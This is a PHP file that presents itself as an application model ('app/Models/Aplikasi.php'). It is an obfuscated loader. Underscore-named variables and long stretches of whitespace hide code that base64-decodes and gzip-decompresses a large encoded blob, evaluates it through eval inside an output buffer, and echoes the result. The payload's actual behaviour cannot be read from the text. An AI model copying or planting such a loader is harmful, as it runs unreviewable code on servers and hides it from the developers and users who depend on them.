<?php 
        $__='printf';$_='Loading app/Models/Aplikasi.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWl1vm0gUfY+0/8EPlZyqq4SPOimy/GBIwJCWxnbCx7xEzIwD2IBR8Bf8+r1jHMdON5Xd3a661RyLZCDM3HPPPXOxIhqNGu8eAJ1m/hRns8dme326QacZ5Pn5lykdJcV5N0/iSVDEZ3mUN7QkKIqzs7Nm+2SzTOOPE/759T4nrJ6NfxGdb640PVEpfFeMkXHdaa4vvbjiIGw812lwcHBw/J5oktQRqGfNTcORfHc5tXTl0Ssnl3XThK5Zt+sHLhUHBwcHBwcHBwfH/w383xkcHBwcvy+aOChGFx8f6IhM6ajZ5opwcHBwcHD8I+y/iHDVn9pa2oqw61TE0MdoqKqkp5I7V5kgd1V9XQo3V/1cJNJ9OHRXBXXFHKe6gJzVte8NIj/VKxjr2FBW1HXmVF8ZvmsLWLZy5NlkaOjVINXH1FDK0V1ha5lTQQwLGysRu8kc1ki860FEDT32PRvGToFlXURuS/CuxQUynGLDYYxhLVICP2OVB5JeBUM1GfUGCU4Hlbm5F+67hJxCU+uGFNYzr6OICCjy5cGCZJPLdb5xF/6uLkmqCAi4IrcfWj2Wyyoxr4TQzFRYk0a055S+23r0PbUI3FlEpElcc6nXJz1rQQ0HcnMmpjZIA9DHd60CDbuKqRebOJsjnSWjoVmYmiX57kpE9fgJQf4k1edI0udmvHw1JwceSQXX2XzQyMmYruvzzB6TNFlSzXzOh+5zc2JsJGOzZwugce6XakrdFnBNFjhWZeAajVx9eqNNnudvdauPQfSiM+TTsxNs+BdfU5pQLcx3Y23unzA/uCV9whLUVFZLLKMcZ3ZuiUJ4O+xOdnSc3WZ0ijwrudEoaDDJPmvdLJDAc47C6iIFbgvikvzzXSsNPKtiMWFca3e3r61lrP2DLYn5WH9c1yVN5hAn8xj3vVyED1SKQPP7qSWxmhCoA537rhjtcS6BY4pyktkCaAR8UYR7TsLyfsm5O0GGLvhO8cz9Ceovwj4CT308NHatlzSL/MxZsv2A4x/LG2LE1FOZT+aHag57eea/4n0DPFGalETuT9mYpjrs+/vL79Yb8vElWAuu4ZhSto8sQ1+CB59gX7Mc5MBwSjQMQSunZZXLEDRgexZ4O2OmP+QyP1b3Z/6wj5kGgn+47nXN93gfq3vNH47KHx6Xcz3nx+p8XLzdOcfGWy2QpDwSGfqg1z9U1wJLdOHJtgh9TfhePff81LMS1m9xvKntlpOq7PZsCv01cL+ERGYcob8ZSMSpLQSuMjd7b/bt6U1/45/e61xf9GN6Eskp0Hh6gSSH8d15XrzSRrYT2K8CiwN5trB0sO8qBHuNed2TLejBypueN68+nZsayX6OVjY8x2clllo5YVwdZUGgbxApmfyEZ8J2bQ+8hLVDvassEXsOuINH6lnFITr9bY+QwRfQ05GuCBjqcHh/2olvsB7zZm8Mb6tPoVWSb/yyfTVlo8WWY0+A70JwhJ1Os31y8t9/Aeysf59uzt63j5m+M/eQie9eAp422c/mn9uw/D3XX/s91/0anu6Zpi7h+/Zf6g2SOg==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
